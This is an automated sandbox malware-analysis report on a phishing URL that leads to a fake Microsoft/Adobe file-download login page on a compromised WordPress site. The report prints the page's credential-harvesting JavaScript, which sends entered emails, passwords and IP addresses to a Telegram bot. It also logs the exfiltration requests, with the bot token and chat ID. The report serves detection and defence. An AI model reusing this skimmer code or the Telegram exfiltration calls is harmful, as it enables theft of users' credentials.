Windows Analysis Report
https://savory-sweet-felidae-psrnd.glitch.me/

Overview

General Information

Sample URL: https://savory-sweet-felidae-psrnd.glitch.me/
Analysis ID: 1591150

Detection

HTMLPhisher
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Javascript uses Telegram API
Uses the Telegram API (likely for C&C communication)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid T&C link found
Javascript checks online IP of machine

Classification

  • System is w10x64
  • chrome.exe (PID: 5684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 6212 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,1981881385979211426,8084460944875189349,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 6104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://savory-sweet-felidae-psrnd.glitch.me/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
dropped/chromecache_41 | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |

Source | Rule | Description | Author | Strings
2.1.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |
2.2.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-14T18:22:40.226205+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49831 | 149.154.167.220 | 443 | TCP
2025-01-14T18:22:41.221243+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49839 | 149.154.167.220 | 443 | TCP
2025-01-14T18:22:52.267650+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49911 | 149.154.167.220 | 443 | TCP
2025-01-14T18:22:53.230796+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49918 | 149.154.167.220 | 443 | TCP
2025-01-14T18:23:07.484471+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 50004 | 149.154.167.220 | 443 | TCP
2025-01-14T18:23:08.458487+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 50006 | 149.154.167.220 | 443 | TCP

        Phishing

        Source: https://www.nordicplow.com/wp-admin/includes/fotex.html | Joe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The provided URL 'www.nordicplow.com' does not match the legitimate domain for Microsoft., The URL 'nordicplow.com' does not have any known association with Microsoft., The presence of input fields for email and password on a non-Microsoft domain is suspicious and indicative of a phishing attempt. DOM: 2.1.pages.csv
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.html | Joe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The provided URL 'www.nordicplow.com' does not match the legitimate domain for Microsoft., The URL 'nordicplow.com' does not contain any elements that suggest a connection to Microsoft., The presence of a different domain name suggests a potential phishing attempt, especially when associated with a well-known brand like Microsoft. DOM: 2.2.pages.csv
        Source: Yara match | File source: 2.1.pages.csv, type: HTML
        Source: Yara match | File source: 2.2.pages.csv, type: HTML
        Source: Yara match | File source: dropped/chromecache_41, type: DROPPED
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.html | Joe Sandbox AI: Page contains button: 'Download' Source: '2.2.pages.csv'
        Source: 0.1.id.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://www.nordicplow.com/wp-admin/includes/fotex... This script exhibits several high-risk behaviors, including data exfiltration, dynamic code execution, and redirection to a suspicious domain. It collects sensitive user information (email and password) and sends it to a Telegram bot, which is a clear indication of malicious intent. Additionally, the script attempts to bypass user interaction by simulating form submission and redirecting the user to a legitimate-looking domain. Overall, this script demonstrates a high level of risk and should be considered as a potential security threat.
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.htmlHTTP Parser: let attemptcount = 0; document.getelementbyid("loginform").addeventlistener("submit", function(e) { e.preventdefault(); const email = document.getelementbyid("email").value; const password = document.getelementbyid("password").value; fetch('https://api.ipify.org?format=json') .then(response => response.json()) .then(data => { const ipaddress = data.ip; const message = `***** tx40 adobe result *****\nemail: ${email}\npassword: ${password}\nip: ${ipaddress}`; const apikey = '6922366229:aah9bkiykg1yggnut2tqso3ntkvv6fyhzru'; const chatid = '6328410070'; const telegramurl = `https://api.telegram.org/bot${apikey}/sendmessage?chat_id=${chatid}&text=${encodeuricomponent(message)}`; attemptcount++; simulatesubmission(telegramurl); })...
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.html | HTTP Parser: Number of links: 0
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.html | HTTP Parser: <input type="password" .../> found but no <form action="...
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.html | HTTP Parser: Title: Download File does not match URL
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.html | HTTP Parser: Invalid link: Privacy & Cookies
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.html | HTTP Parser: <input type="password" .../> found
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.html | HTTP Parser: No favicon
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.html | HTTP Parser: No <meta name="author".. found
        Source: https://www.nordicplow.com/wp-admin/includes/fotex.html | HTTP Parser: No <meta name="copyright".. found

        Networking

        Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49839 -> 149.154.167.220:443
        Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49831 -> 149.154.167.220:443
        Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49911 -> 149.154.167.220:443
        Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49918 -> 149.154.167.220:443
        Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:50006 -> 149.154.167.220:443
        Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:50004 -> 149.154.167.220:443
        Source: unknown | DNS query: name: api.telegram.org
        Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: savory-sweet-felidae-psrnd.glitch.meConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-admin/includes/fotex.html HTTP/1.1Host: www.nordicplow.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://savory-sweet-felidae-psrnd.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wikipedia/commons/4/44/Microsoft_logo.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.nordicplow.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wikipedia/commons/8/87/PDF_file_icon.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.nordicplow.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.nordicplow.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.nordicplow.com/wp-admin/includes/fotex.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wikipedia/commons/4/44/Microsoft_logo.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wikipedia/commons/8/87/PDF_file_icon.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1Host: www.nordicplow.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.nordicplow.com/wp-admin/includes/fotex.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1Host: www.nordicplow.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.nordicplow.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.nordicplow.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1Host: api.telegram.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.nordicplow.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.nordicplow.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global traffic | DNS traffic detected: DNS query: www.google.com
        Source: global traffic | DNS traffic detected: DNS query: savory-sweet-felidae-psrnd.glitch.me
        Source: global traffic | DNS traffic detected: DNS query: www.nordicplow.com
        Source: global traffic | DNS traffic detected: DNS query: upload.wikimedia.org
        Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
        Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
        Source: chromecache_41.3.dr | String found in binary or memory: https://api.ipify.org?format=json
        Source: chromecache_41.3.dr | String found in binary or memory: https://api.telegram.org/bot$
        Source: chromecache_41.3.dr | String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg
        Source: chromecache_41.3.dr | String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/8/87/PDF_file_icon.svg
        Source: chromecache_44.3.dr | String found in binary or memory: https://www.fikox.com/
        Source: chromecache_44.3.dr | String found in binary or memory: https://www.nordicplow.com/wp-admin/includes/fotex.html
        Source: chromecache_41.3.dr | String found in binary or memory: https://www.office.com
        Source: classification engine | Classification label: mal80.phis.troj.win@17/21@20/9
        Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,1981881385979211426,8084460944875189349,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://savory-sweet-felidae-psrnd.glitch.me/"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 2 Browser Extensions | 1 Process Injection | 1 Process Injection | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | 1 Ingress Tool Transfer | Scheduled Transfer | Data Encrypted for Impact
        Source | Detection | Scanner | Label | Link
        https://savory-sweet-felidae-psrnd.glitch.me/ | 0% | Avira URL Cloud | safe |
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        https://www.nordicplow.com/favicon.ico | 0% | Avira URL Cloud | safe |
        https://www.nordicplow.com/wp-includes/images/w-logo-blue-white-bg.png | 0% | Avira URL Cloud | safe |
        https://www.fikox.com/ | 0% | Avira URL Cloud | safe |
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        nordicplow.com | 192.124.249.155 | true | true |  | unknown
        www.google.com | 142.250.186.164 | true | false |  | high
        api.ipify.org | 104.26.12.205 | true | false |  | high
        upload.wikimedia.org | 185.15.59.240 | true | false |  | high
        savory-sweet-felidae-psrnd.glitch.me | 34.233.109.53 | true | false |  | unknown
        api.telegram.org | 149.154.167.220 | true | false |  | high
        www.nordicplow.com | unknown | unknown | true |  | unknown
        Name | Malicious | Antivirus Detection | Reputation
        https://api.telegram.org/bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 | false |  | high
        https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg | false |  | high
        https://upload.wikimedia.org/wikipedia/commons/8/87/PDF_file_icon.svg | false |  | high
        https://www.nordicplow.com/favicon.ico | false | Avira URL Cloud: safe | unknown
        https://savory-sweet-felidae-psrnd.glitch.me/ | false |  | unknown
        https://www.nordicplow.com/wp-includes/images/w-logo-blue-white-bg.png | false | Avira URL Cloud: safe | unknown
        https://www.nordicplow.com/wp-admin/includes/fotex.html | true |  | unknown
        https://api.ipify.org/?format=json | false |  | high
        Name | Source | Malicious | Antivirus Detection | Reputation
        https://api.telegram.org/bot$ | chromecache_41.3.dr | false |  | high
        https://www.fikox.com/ | chromecache_44.3.dr | false | Avira URL Cloud: safe | unknown
        https://www.office.com | chromecache_41.3.dr | false |  | high
        https://api.ipify.org?format=json | chromecache_41.3.dr | false |  | high
        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
        34.233.109.53 | savory-sweet-felidae-psrnd.glitch.me | United States |  | 14618 | AMAZON-AESUS | false
        104.26.12.205 | api.ipify.org | United States |  | 13335 | CLOUDFLARENETUS | false
        192.124.249.155 | nordicplow.com | United States |  | 30148 | SUCURI-SECUS | true
        149.154.167.220 | api.telegram.org | United Kingdom |  | 62041 | TELEGRAMRU | false
        239.255.255.250 | unknown | Reserved |  | unknown | unknown | false
        185.15.59.240 | upload.wikimedia.org | Netherlands |  | 14907 | WIKIMEDIAUS | false
        142.250.186.164 | www.google.com | United States |  | 15169 | GOOGLEUS | false
        IP
        192.168.2.6
        192.168.2.24
                                        Joe Sandbox version:42.0.0 Malachite
                                        Analysis ID:1591150
                                        Start date and time:2025-01-14 18:21:23 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 3m 2s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:browseurl.jbs
                                        Sample URL:https://savory-sweet-felidae-psrnd.glitch.me/
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:7
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal80.phis.troj.win@17/21@20/9
                                        • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 142.250.74.195, 142.250.185.110, 142.251.168.84, 142.250.186.78, 142.250.185.238, 142.250.184.206, 142.250.184.234, 216.58.206.74, 172.217.16.202, 142.250.186.42, 216.58.212.170, 172.217.18.10, 142.250.185.234, 216.58.212.138, 142.250.185.74, 142.250.186.74, 142.250.186.170, 142.250.185.138, 142.250.185.202, 142.250.185.106, 172.217.18.106, 142.250.185.170, 199.232.210.172, 2.23.77.188, 172.217.16.206, 142.250.184.227, 13.107.246.45, 184.28.90.27, 20.109.210.53
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                        • Not all processes were analyzed, report is missing behavior information
                                        • VT rate limit hit for: https://savory-sweet-felidae-psrnd.glitch.me/
                                        No simulations
                                        No context
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:dropped
                                        Size (bytes):5094
                                        Entropy (8bit):4.834039771497343
                                        Encrypted:false
                                        SSDEEP:96:5NfSH5pziTJNziTzJgaH+PRpJM+GKq4MsB4Hz7oG9fpdOiXlj8Hdaus:jo+TSTFgaePjC+GKx4T7okHONaus
                                        MD5:A8FEAF8EA80C17228A67DFEB1E251D8F
                                        SHA1:38A4598BA356C8E43E6A6EA2E59587AB76D26A05
                                        SHA-256:35F933EFDC4AC3426775ABF70B002C39D5A9D98B343A11E44A21EB3D0C952FD3
                                        SHA-512:0E969BAB0E5338E0EEC990D39A01D13BB88A687EF4986FC1407C2416014179A4D15BDD61074441014487E4E978D1025FE9B6A1D16BFDE3CD706B0F6073C6C094
                                        Malicious:false
                                        Reputation:low
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, Unicode text, UTF-8 text
                                        Category:downloaded
                                        Size (bytes):5875
                                        Entropy (8bit):4.39212305369154
                                        Encrypted:false
                                        SSDEEP:96:8N+TMXNrFL8FkV8FkPFi3mJBpRPaVO5jxJIs1V6osNv6D7RnsDJdiQlXMz:8N3RFL8FkV8FkPFi3mJ1EOvJIOsNixnR
                                        MD5:19F710D6BBAE893DE88DB51707251AA1
                                        SHA1:7225538EAE4CA0847E5DD57C2886813AC1512DE9
                                        SHA-256:B48FCD71F2AB56C8722C9AA9857E0559290E2240296026ABCD62CC055A8ABFBE
                                        SHA-512:BC129124EE0453C5F421FE462A10CBED0E3C4535FA13E8176FB4C643965AB215F32F5B7D839D809763899F08C33BE38D3CCBAD0AD7429B474BE9AA3AD8C251AC
                                        Malicious:false
                                        Reputation:low
                                        URL:https://www.nordicplow.com/wp-admin/includes/fotex.html
                                        Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>Download File</title>. <style>. body {. margin: 0;. padding: 0;. font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;. background-color: #f3f2f1;. display: flex;. justify-content: center;. align-items: center;. height: 100vh;. flex-direction: column;. }.. .header {. width: 100%;. padding: 15px;. position: absolute;. top: 0;. left: 0;. display: flex;. justify-content: left;. align-items: center;. }.. .header img {. width: 30px;. margin-left: 20px;. }.. .adobe-logo {. margin-top: 10px;. margin-bottom: 20px;. }.. .adobe-logo img {.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:dropped
                                        Size (bytes):272
                                        Entropy (8bit):4.825230707379318
                                        Encrypted:false
                                        SSDEEP:6:tI9mc4sl3u7Ee/Uw4tzC/CHftwHK32KHzCF3cHoKgwHKY:t41uwPwge/CHFyKGKHeVpyKY
                                        MD5:363FDD53D34303B727D9DAB161B8E88B
                                        SHA1:5B170117926AE5A5E451AA24676B5A124C2FA122
                                        SHA-256:3D41251F93127B4B42C2F69FA423D204946CF9C307D786EA36B8D9BEF4179282
                                        SHA-512:6369E9E3B0F49D5BE6C43724C01D34E7B9871E9D709C628ED0963B94183729AABB2D9778EED4405D87C5080DEA19156970DAB6B8D69EDB860ADC5C1A400FAFB3
                                        Malicious:false
                                        Reputation:low
                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 23"><path fill="#f3f3f3" d="M0 0h23v23H0z"/><path fill="#f35325" d="M1 1h10v10H1z"/><path fill="#81bc06" d="M12 1h10v10H12z"/><path fill="#05a6f0" d="M1 12h10v10H1z"/><path fill="#ffba08" d="M12 12h10v10H12z"/></svg>
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):478
                                        Entropy (8bit):5.1929010900410555
                                        Encrypted:false
                                        SSDEEP:12:YKOHu/P8jTfUiUa3XHJZjxAqWEW4fJm8x2BumEMVEiWGUfh4bROC79:YKOHbH3UaHJh6qWKRmM2BnjVEMbROC79
                                        MD5:E817B40200087645E44855E6DC31DE76
                                        SHA1:DAAF7F2EC59C8B21A77B427357E48CF619425F94
                                        SHA-256:0052E4CD8C929640E465F6BEF22DBF98C81A811699C99962E122CED9C9CA966A
                                        SHA-512:D872366158FAE25C835087CD69367EA3DCC9CE2CE411ADB06066A995E74606207704DDF57359A0CEECD9BF1BAEDFD61567D14358D68A22DDD74BC57AF5A59656
                                        Malicious:false
                                        Reputation:low
                                        Preview:{"ok":true,"result":{"message_id":865,"from":{"id":6922366229,"is_bot":true,"first_name":"nkp","username":"remaxx356bot"},"chat":{"id":6328410070,"first_name":"MSN","last_name":"LOGGER","username":"mhscort22","type":"private"},"date":1736875388,"text":"***** TX40 Adobe R\u034fe\u034fs\u034fu\u034fl\u034ft\u034f *****\nEmail: q4ft2u@ngw.net\nPassword: G_@s)w?ufRY\nIP: 8.46.123.189","entities":[{"offset":43,"length":14,"type":"email"},{"offset":84,"length":12,"type":"url"}]}}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text
                                        Category:downloaded
                                        Size (bytes):1266
